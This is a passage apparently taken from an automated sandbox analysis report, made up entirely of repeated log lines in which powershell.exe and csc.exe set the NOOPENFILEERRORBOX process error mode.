      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
